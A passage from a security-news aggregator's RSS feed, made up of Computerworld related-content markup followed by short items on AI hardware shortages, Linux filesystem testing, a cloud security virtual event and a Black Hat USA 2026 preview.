class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/1614899/android-contacts-management-ultimate-guide.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">how-to</span></div><h3 class="card__title">The ultimate guide to Android contacts management</h3><p class="card__description">Your Android phone's contacts are much more than just a glorified Rolodex. Ready for an unexpected productivity upgrade? </p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By JR Raphael</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>16 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Android</span></span><span class="card__tag"><span class="tag">Google</span></span><span class="card__tag"><span class="tag">Productivity Software</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195494/openai-launches-chatgpt-work-as-it-broadens-gpt-5-6-rollout-2.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">OpenAI launches ChatGPT Work as it broadens GPT-5.6 rollout</h3><p class="card__description">The enterprise AI agent combines ChatGPT, Codex, and GPT-5.6 to automate workplace tasks as OpenAI broadens rollout of its latest frontier models.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Gyana Swain</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Productivity Software</span></span></div></div></div></a></div></div><div class="grid content-listing-articles__button-wrapper">
			<div class="col-6 col-4@md col-start-5@md"><div class="content-listing-articles__button-show">
					<button class="button button--tertiary" type="button" data-toggle="expand">
						<span>Show more</span>
						<span>
							<svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
								<use xlink:href="#icon-chevron-down"></use>
							</svg>
						</span>
					</button>
				</div>
				<div class="content-listing-articles__button-show content-listing-articles__button-show--hide">
					<button class="button button--tertiary" type="button" data-toggle="collapse">
						<span>Show less</span>
						<span>
							<svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
								<use xlink:href="#icon-chevron-up"></use>
							</svg>
						</span>
					</button>
				</div></div><div class="col-6 col-4@md content-listing-articles__button-view-all">
						<a class="button" href="https://www.computerworld.com/artificial-intelligence/feed/page/2/" target="_blank"> View all </a></div></div></div></div><section class="suggested-content-upcoming-events"><div class="container">
				<h2 class="suggested-content-upcoming-events__title">Upcoming Events</h2><a class="grid suggested-content-upcoming-events__item" href="https://event.foundryco.com/cio-100-uk/" aria-label="Go to content"><div class="col-12 col-3@md suggested-content-upcoming-events__date-label dd"><span class="date-label">Sep/24</span></div><div class="col-12 col-4@md col-5@xl suggested-content-upcoming-events__image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/03/4141846-0-37933000-1772809522-CIO-Summit-2025_17.jpg?quality=50&amp;strip=all&amp;w=1045" alt="Image"></div></div>
			<div class="col-12 col-5@md col-4@xl suggested-content-upcoming-events__card">
				<div class="card card--xl">
					<div class="card__header"><span class="card__content-type">conference</span><span class="card__external-link-icon" data-url="https://event.foundryco.com/cio-100-uk/"><svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <use xlink:href="#icon-arrow-up-right-from-square"></use></svg></span></div><h3 class="card__title">CIO 100 Awards &amp; Conference UK</h3><div class="card__info card__info--light"><span>24 Sep 2026</span><span>London, UK</span></div>
		<div class="card__tags"><span class="card__tag"><span class="tag">Microsoft 365</span></span></div></div>
			</div>
		</a><a class="grid suggested-content-upcoming-events__item" href="https://event.foundryco.com/cso-awards-conference-uk/" aria-label="Go to content"><div class="col-12 col-3@md suggested-content-upcoming-events__date-label dd"><span class="date-label">Nov/26</span></div><div class="col-12 col-4@md col-5@xl suggested-content-upcoming-events__image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4141741-0-97812100-1780312469-60CB82BE-5D6E-40E0-8E5E-0151C8C46E7F.jpg?quality=50&amp;strip=all&amp;w=929" alt="Image"></div></div>
			<div class="col-12 col-5@md col-4@xl suggested-content-upcoming-events__card">
				<div class="card card--xl">
					<div class="card__header"><span class="card__content-type">conference</span><span class="card__external-link-icon" data-url="https://event.foundryco.com/cso-awards-conference-uk/"><svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <use xlink:href="#icon-arrow-up-right-from-square"></use></svg></span></div><h3 class="card__title">CSO Awards &amp; Conference UK</h3><div class="card__info card__info--light"><span>26 Nov 2026</span><span>London, UK</span></div>
		<div class="card__tags"><span class="card__tag"><span class="tag">Cyberattacks</span></span></div></div>
			</div>
		</a></div><div class="suggested-content-upcoming-events__button-container container">
						<a class="button" href="https://www.computerworld.com/events/"> View all events</a>
					</div>
				
			</section><div class="advert">
						<div class="container advert__container">
							<div class="advert__content">
								<div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false"></div>
							</div>
						</div>
					</div><section class="related-content-resources">
				<div class="container">
				<h2 class="related-content-resources__title">Resources</h2><div class="grid related-content-resources__content"><div class="col-12 col-7@md col-8@lg grid grid--cols-7@md grid--cols-8@lg related-content-resources__main-content">
			<div class="col-12 col-7@md col-6@lg">
				<a class="card card--xxl" href="https://us.resources.computerworld.com/resources/accelerate-your-cloud-migration-with-atlassian-fastshift-6?utm_source=rss-feed&amp;utm_medium=rss&amp;utm_campaign=feed" rel="noreferrer" aria-label="Go to content">
					<div class="card__header">
						<span class="card__content-type">whitepaper</span>
					</div>
					<h3 class="card__title">Accelerate your cloud migration with Atlassian FastShift</h3>
					<p class="card__description"></p><p>Turn an Atlassian cloud migration into a faster, more predictable transformation. In this session, you’ll walk through the FastShift playbook.</p>
<p>The post <a rel="nofollow" href="https://com.wp.idg.zone/resources/accelerate-your-cloud-migration-with-atlassian-fastshift-6/">Accelerate your cloud migration with Atlassian FastShift</a> appeared first on <a rel="nofollow" href="https://com.wp.idg.zone/">Whitepaper Repository –</a>.</p>

					<div class="card__info">
						<span>
						By 
						Atlassian
						</span>
					</div>
					<div class="card__info card__info--light"><span>14 Jul 2026</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Business Operations</span></span><span class="card__tag"><span class="tag">Cloud</span></span><span class="card__tag"><span class="tag">Digital Transformation</span></span></div></a>
			</div>
			<div class="col-2 related-content-resources__featured-image-wrapper">
				<img width="400px" loading="lazy" class="related-content-resources__image-featured" src="https://us.resources.computerworld.com/wp-content/uploads/2026/07/atl_logo1784040704.83.png" alt="Image">
			</div>
		</div><div class="col-12 col-5@md col-4@lg col-start-9@lg related-content-resources__cards"><div class="grid grid--cols-5@md grid--cols-4@lg related-content-resources__card-wrapper">
				<div class="col-12 col-5@md col-3@lg">
					<a class="card card--sm" href="https://us.resources.computerworld.com/resources/warum-sich-teams-fur-cloud-entscheiden-9?utm_source=rss-feed&amp;utm_medium=rss&amp;utm_campaign=feed" rel="noreferrer" aria-label="Go to content">
						<div class="card__header">
							<span class="card__content-type">whitepaper</span>
						</div>
						<h3 class="card__title">Warum sich Teams für Cloud entscheiden</h3>
						<div class="card__info">
							<span>
							By 
							Atlassian
							</span>
						</div>
						<div class="card__info card__info--light"><span>14 Jul 2026</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Business Operations</span></span><span class="card__tag"><span class="tag">Cloud</span></span><span class="card__tag"><span class="tag">Digital Transformation</span></span></div></a>
				</div>
				<div class="col-1">
					<img width="400px" loading="lazy" class="related-content-resources__image-side" src="https://us.resources.computerworld.com/wp-content/uploads/2026/07/atl_logo1784040716.4772.png" alt="Image">
				</div>
			</div><div class="grid grid--cols-5@md grid--cols-4@lg related-content-resources__card-wrapper">
				<div class="col-12 col-5@md col-3@lg">
					<a class="card card--sm" href="https://us.resources.computerworld.com/resources/pourquoi-les-equipes-optent-pour-la-solution-cloud-3?utm_source=rss-feed&amp;utm_medium=rss&amp;utm_campaign=feed" rel="noreferrer" aria-label="Go to content">
						<div class="card__header">
							<span class="card__content-type">whitepaper</span>
						</div>
						<h3 class="card__title">Pourquoi les équipes optent pour la solution cloud</h3>
						<div class="card__info">
							<span>
							By 
							Atlassian
							</span>
						</div>
						<div class="card__info card__info--light"><span>14 Jul 2026</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Business Operations</span></span><span class="card__tag"><span class="tag">Cloud</span></span><span class="card__tag"><span class="tag">Digital Transformation</span></span></div></a>
				</div>
				<div class="col-1">
					<img width="400px" loading="lazy" class="related-content-resources__image-side" src="https://us.resources.computerworld.com/wp-content/uploads/2026/07/atl_logo1784040728.9116.png" alt="Image">
				</div>
			</div></div>
		</div><div class="related-content-resources__button-container">
			<a class="button" target="_blank" href="https://us.resources.computerworld.com/"> View all </a>
		</div></div>
			</section><div class="advert">
						<div class="container advert__container">
							<div class="advert__content">
								<div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false"></div>
							</div>
						</div>
					</div><section class="related-content-podcasts"><div class="container"><h2 class="related-content-podcasts__title">Podcasts</h2><div class="grid related-content-podcasts__content"><a class="col-12 col-7@md col-8@lg grid grid--cols-7@md grid--cols-8@lg related-content-podcasts__main-content" href="https://www.computerworld.com/podcasts/2-minute-tech-briefing/" aria-label="Go to content"><div class="col-12 col-7@md col-2@lg related-content-podcasts__image">
			<div class="image image--aspect-ratio-1-1">
				<img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2025/11/100065453-0-01782600-1762961273-2-min-tech-briefing-logo-16x9-4.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Image">
			</div>
		</div><div class="col-12 col-7@md col-6@lg"><div class="card card--xl"><div class="card__header"><span class="card__content-type"> podcasts</span></div><h3 class="card__title">2-Minute Tech Briefing</h3><p class="card__description">Catch up on the latest enterprise IT news in a fast-paced video briefing with host Arnold Davick. Listen to the show on Computerworld, YouTube, Apple and Spotify.</p><div class="card__info card__info--light"><span>81  episodes</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Emerging Technology</span></span></div></div></div></a><ul class="col-12 col-5@md col-4@lg col-start-9@lg related-content-podcasts__cards"><li class="related-content-podcasts__card"><a href="https://www.computerworld.com/podcast/4176380/microsoft-copilot-growth-claudebleed-risk-linkedin-gdpr-complaint-ep-84.html" aria-label="Go to episode"><div class="related-content-podcasts__episode-label">
			<span class="episode-label">
				<span> Ep. 81</span>
				<span>
				<svg class="icon" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
					<use xlink:href="#icon-podcast"></use>
				</svg>
			</span>
			</span>
		</div><div class="card card--xs"><h3 class="card__title">Microsoft Copilot Growth, ClaudeBleed Risk, LinkedIn GDPR Complaint | Ep. 84</h3><div class="card__info">
				<span>By Arnold Davick</span>
			</div><div class="card__info card__info--light">
			<span>Mar 20, 2024</span><span>2 mins</span>
		</div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div></a></li><li class="related-content-podcasts__card"><a href="https://www.computerworld.com/podcast/4176367/chrome-gemini-ai-agents-cisa-infrastructure-cyber-resilience-ep-83.html" aria-label="Go to episode"><div class="related-content-podcasts__episode-label">
			<span class="episode-label">
				<span> Ep. 80</span>
				<span>
				<svg class="icon" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
					<use xlink:href="#icon-podcast"></use>
				</svg>
			</span>
			</span>
		</div><div class="card card--xs"><h3 class="card__title">Chrome Gemini, AI Agents, CISA Infrastructure Cyber Resilience | Ep. 83</h3><div class="card__info">
				<span>By Arnold Davick</span>
			</div><div class="card__info card__info--light">
			<span>Mar 20, 2024</span><span>2 mins</span>
		</div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div></a></li></ul></div></div></section><section class="related-content-video"><div class="container"><h2 class="related-content-video__title">Video on demand</h2><div class="grid related-content-video__main">        <div class="col-12 col-4@lg related-content-video__main-card card card--xl">
            <div class="card__header"><span class="card__content-type">video</span></div>            
            <a class="card card--xl" href="https://www.computerworld.com/video/4196734/why-ai-agents-fail-when-enterprises-dont-define-the-job.html" aria-label="Go to content">
                <h3 class="card__title">Why AI agents fail when enterprises don’t define the job</h3>            </a>
                            <p class="card__description mt-3">Enterprises are investing heavily in AI agents, but many projects fail when companies skip clear goals, guardrails, governance and success metrics.</p>
            
                         <div class="card__info card__info--light"><span>Jul 14, 2026 </span><span>33 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">IT Governance</span></span></div>        </div>
                <div class="col-12 col-8@lg related-content-video__video">
                            <div class="youtube-video">
                    &gt;
					
				</div>                </div>
                    </div>
        </div><div class="related-content-video__cards-container">
                        <div class="related-content-video__cards-wrap">
                            <ul class="grid related-content-video__cards">        <li class="col-4@md related-content-video__card">
            <a class="related-content-video__card-link" href="https://www.computerworld.com/video/4193952/why-enterprise-ai-projects-stall-before-delivering-real-value.html" aria-label="Go to content">
                <div class="related-content-video__card-image">
                    <div class="image">
                        <img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4193952-0-52301800-1783446508-youtube-thumbnail-gu6x40jhZ1s_3cbf50.jpg?quality=50&amp;strip=all&amp;w=300" alt="Image" sizes="300px">
                    </div>
                </div>
                <div class="card card--xs">
                    <h3 class="card__title">Why enterprise AI projects stall before delivering real value</h3>
                                         <div class="card__info card__info--light"><span>Jul 7, 2026 </span><span>29 mins</span></div>                    <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">ROI and Metrics</span></span></div>                </div>
            </a>
        </li>
                <li class="col-4@md related-content-video__card">
            <a class="related-content-video__card-link" href="https://www.computerworld.com/video/4191262/how-ai-is-breaking-job-interviews-skills-testing-and-evaluation.html" aria-label="Go to content">
                <div class="related-content-video__card-image">
                    <div class="image">
                        <img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4191262-0-24248500-1782847008-youtube-thumbnail-lVEejCXC4lU_b223c5.jpg?quality=50&amp;strip=all&amp;w=300" alt="Image" sizes="300px">
                    </div>
                </div>
                <div class="card card--xs">
                    <h3 class="card__title">How AI is breaking job interviews, skills testing and evaluation</h3>
                                         <div class="card__info card__info--light"><span>Jun 30, 2026 </span><span>32 mins</span></div>                    <div class="card__tags"><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Hiring</span></span><span class="card__tag"><span class="tag">IT Skills and Training</span></span></div>                </div>
            </a>
        </li>
                <li class="col-4@md related-content-video__card">
            <a class="related-content-video__card-link" href="https://www.computerworld.com/video/4188534/how-ai-is-reshaping-cybersecurity.html" aria-label="Go to content">
                <div class="related-content-video__card-image">
                    <div class="image">
                        <img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4188534-0-45176600-1782243369-youtube-thumbnail-5DLoQMU0nZc_de9df9.jpg?quality=50&amp;strip=all&amp;w=300" alt="Image" sizes="300px">
                    </div>
                </div>
                <div class="card card--xs">
                    <h3 class="card__title">How AI is reshaping cybersecurity</h3>
                                         <div class="card__info card__info--light"><span>Jun 23, 2026 </span><span>44 mins</span></div>                    <div class="card__tags"><span class="card__tag"><span class="tag">Cyberattacks</span></span><span class="card__tag"><span class="tag">Cybercrime</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div>                </div>
            </a>
        </li>
        </ul></div></div><div class="related-content-video__button-container"><a class="button" target="_self" href="https://www.computerworld.com/videos/">See all videos</a></div></section></div><section class="suggested-content-various"><div class="container"><div class="grid suggested-content-various__content"><div class="col-12 col-3@lg">
			<h2 class="suggested-content-various__title">Show me more</h2><div class="suggested-content-various__filters"><span class="suggested-content-various__filter"><button class="chip chip--filter chip--active" type="button" data-filter-key="latest">Latest</button></span><span class="suggested-content-various__filter"><button class="chip chip--filter" type="button" data-filter-key="article">Articles</button></span><span class="suggested-content-various__filter"><button class="chip chip--filter" type="button" data-filter-key="podcast">Podcasts</button></span><span class="suggested-content-various__filter"><button class="chip chip--filter" type="button" data-filter-key="video">Videos</button></span></div>
		</div><div class="col-12 col-9@lg suggested-content-various__items-wrap"><div class="grid grid--cols-9@lg suggested-content-various__items"><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				latest,article"><a class="suggested-content-various__link" href="https://www.computerworld.com/article/4195055/apple-finally-calls-time-on-15-year-old-device-support.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">opinion</span> </div> <h3 class="card__title">Apple finally calls time on 15-year-old device support</h3> <div class="card__info"><span>By Jonny Evans</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-07-09T16:15:14+00:00">Jul 9, 2026</span><span>4 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Smartphones</span></span><span class="card__tag"><span class="tag">iPhone</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4195055-0-47500100-1783613766-iPhone4s_3up_Photo_Siri_Sprgbd_PRINT.jpg?quality=50&amp;strip=all&amp;w=219" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				article"><a class="suggested-content-various__link" href="https://www.computerworld.com/article/4194931/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">brandpost</span> <span class="card__sponsor-text">Sponsored by Tether</span></div> <h3 class="card__title">Physical AI will see the fusion of robotics and AI transform the world</h3> <div class="card__info"><span>By tether</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-07-09T11:11:53+00:00">9 Jul 2026</span><span>6 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4194931-0-76347600-1783595551-QVAC-Paid-Ad-1-_-1200-x-800.png?w=375" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				article"><a class="suggested-content-various__link" href="https://www.computerworld.com/article/4194914/spacexai-launches-grok-4-5-touts-lower-coding-task-costs-than-ai-rivals-2.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">news</span> </div> <h3 class="card__title">SpaceXAI launches Grok 4.5, touts lower coding-task costs than AI rivals</h3> <div class="card__info"><span>By Prasanth Aby Thomas</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-07-09T10:26:11+00:00">Jul 9, 2026</span><span>5 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Developer</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4194914-0-24417700-1783592810-AI-vibe-coding-one-hand-is-robot-one-hand-is-human.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				latest,podcast"><a class="suggested-content-various__link" href="https://www.computerworld.com/podcast/4176380/microsoft-copilot-growth-claudebleed-risk-linkedin-gdpr-complaint-ep-84.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">podcast</span> </div> <h3 class="card__title">Microsoft Copilot Growth, ClaudeBleed Risk, LinkedIn GDPR Complaint | Ep. 84</h3> <div class="card__info"><span>By Arnold Davick</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-05-22T15:04:16+00:00">May 22, 2026</span><span>2 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/05/0-46106000-1779462321-youtube-thumbnail-5PkKYThsKy8.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				podcast"><a class="suggested-content-various__link" href="https://www.computerworld.com/podcast/4176367/chrome-gemini-ai-agents-cisa-infrastructure-cyber-resilience-ep-83.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">podcast</span> </div> <h3 class="card__title">Chrome Gemini, AI Agents, CISA Infrastructure Cyber Resilience | Ep. 83</h3> <div class="card__info"><span>By Arnold Davick</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-05-22T14:53:18+00:00">May 22, 2026</span><span>2 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/05/0-06017100-1779461653-youtube-thumbnail-XH7vduM7uz8.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				podcast"><a class="suggested-content-various__link" href="https://www.computerworld.com/podcast/4172579/ai-triage-gains-model-reviews-ask-jeeves-shutdown-ep-82.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">podcast</span> </div> <h3 class="card__title">AI Triage Gains, Model Reviews, Ask Jeeves Shutdown | Ep. 82</h3> <div class="card__info"><span>By Arnold Davick</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-05-18T19:31:15+00:00">May 18, 2026</span><span>2 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/05/0-62824900-1779132751-youtube-thumbnail-P3R6blMndrU.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				latest,video"><a class="suggested-content-various__link" href="https://www.computerworld.com/video/4185559/why-ai-agents-could-create-a-new-control-and-security-crisis.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">video</span> </div> <h3 class="card__title">Why AI agents could create a new control and security crisis</h3> <div class="card__info"><span></span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-06-16T11:47:15+00:00">Jun 16, 2026</span><span>28 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">IT Governance</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4185559-0-48713800-1781610470-youtube-thumbnail-uPpd9EJ4iNI_55eb26.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				video"><a class="suggested-content-various__link" href="https://www.computerworld.com/video/4182978/does-quality-suffer-when-ai-generates-code.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">video</span> </div> <h3 class="card__title">Does quality suffer when AI generates code?</h3> <div class="card__info"><span></span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-06-09T14:32:51+00:00">Jun 9, 2026</span><span>35 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Code Security</span></span><span class="card__tag"><span class="tag">Developer</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4182978-0-61230000-1781015610-youtube-thumbnail-1hAfDQkuyhs_faa994.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				video"><a class="suggested-content-various__link" href="https://www.computerworld.com/video/4180043/what-happens-when-ai-starts-selling-to-ai.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">video</span> </div> <h3 class="card__title">What happens when AI starts selling to AI?</h3> <div class="card__info"><span></span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-06-02T15:00:42+00:00">Jun 2, 2026</span><span>38 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Procurement Software</span></span><span class="card__tag"><span class="tag">Salesforce Automation </span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4180043-0-78180900-1780412479-youtube-thumbnail-jPv-TAenlto_c79318.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div></div></div></div></div></section>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Hardware Shortages: How Enterprises Can Do More With Existing Infrastructure]]></title>
<description><![CDATA[Key takeaways AI hardware shortages are forcing enterprises to rethink how they plan, deploy and scale AI infrastructure. GPU shortages, procurement delays and rising infrastructure costs are delaying enterprise IT projects, not just AI initiatives. Organizations can reduce the impact of hardware...]]></description>
<link>https://tsecurity.de/de/3671767/unix-server/ai-hardware-shortages-how-enterprises-can-do-more-with-existing-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671767/unix-server/ai-hardware-shortages-how-enterprises-can-do-more-with-existing-infrastructure/</guid>
<pubDate>Wed, 15 Jul 2026 22:01:07 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key takeaways AI hardware shortages are forcing enterprises to rethink how they plan, deploy and scale AI infrastructure. GPU shortages, procurement delays and rising infrastructure costs are delaying enterprise IT projects, not just AI initiatives. Organizations can reduce the impact of hardware constraints by improving utilization, increasing portability, optimizing existing infrastructure, and using MSP or […]</p>
<p>The post <a href="https://www.suse.com/c/ai-hardware-shortages-how-enterprises-can-do-more-with-existing-infrastructure/">AI Hardware Shortages: How Enterprises Can Do More With Existing Infrastructure</a> appeared first on <a href="https://www.suse.com/c">SUSE Communities</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Topics in filesystem testing]]></title>
<description><![CDATA[It should come as no surprise that a gathering of filesystem developers
would discuss filesystem testing; it has been a mainstay of the Linux Storage,
Filesystem, Memory Management, and BPF Summit over the years and the
2026 summit was no exception.  Ted Ts'o led the discussion this time; he
had ...]]></description>
<link>https://tsecurity.de/de/3671401/linux-tipps/topics-in-filesystem-testing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671401/linux-tipps/topics-in-filesystem-testing/</guid>
<pubDate>Wed, 15 Jul 2026 18:43:14 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It should come as no surprise that a gathering of filesystem developers
would discuss filesystem testing; it has been a mainstay of the <a href="https://events.linuxfoundation.org/lsfmmbpf/">Linux Storage,
Filesystem, Memory Management, and BPF Summit</a> over the years and the
2026 summit was no exception.  Ted Ts'o led the discussion this time; he
had a few different topics to raise, including his perception of increasing
regressions for ext4 in the stable kernels and what can be done to help
reduce them.  As <a href="https://lwn.net/Articles/789225/">with</a> <a href="https://lwn.net/Articles/896523/">other</a> <a href="https://lwn.net/Articles/937830/">similar</a>
<a href="https://lwn.net/Articles/982099/">sessions</a> at the summit over the years,
there is a lot of interest in collaborating on test inputs and outputs, but
finding a way to centralize that information has so far eluded the
filesystem community.]]></content:encoded>
</item>
<item>
<title><![CDATA[Virtual Event Today: Cloud & Data Security Summit]]></title>
<description><![CDATA[Attendees will be able to interact with leading solution providers and other end users facing similar challenges in securing a variety of cloud deployments.
The post Virtual Event Today: Cloud & Data Security Summit appeared first on SecurityWeek.]]></description>
<link>https://tsecurity.de/de/3670753/it-security-nachrichten/virtual-event-today-cloud-data-security-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670753/it-security-nachrichten/virtual-event-today-cloud-data-security-summit/</guid>
<pubDate>Wed, 15 Jul 2026 15:09:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Attendees will be able to interact with leading solution providers and other end users facing similar challenges in securing a variety of cloud deployments.</p>
<p>The post <a href="https://www.securityweek.com/virtual-event-today-cloud-data-security-summit/">Virtual Event Today: Cloud &amp; Data Security Summit</a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What to Expect at Black Hat USA 2026]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 8x - Views:51 Over 20,000 practitioners. 100+ hands-on training courses. Peer-reviewed research that doesn't exist anywhere else yet. Black Hat USA runs August 1-6, 2026 in Las Vegas, and this year's agenda is shaping up to be the most exciting one yet.
 
Black Hat ...]]></description>
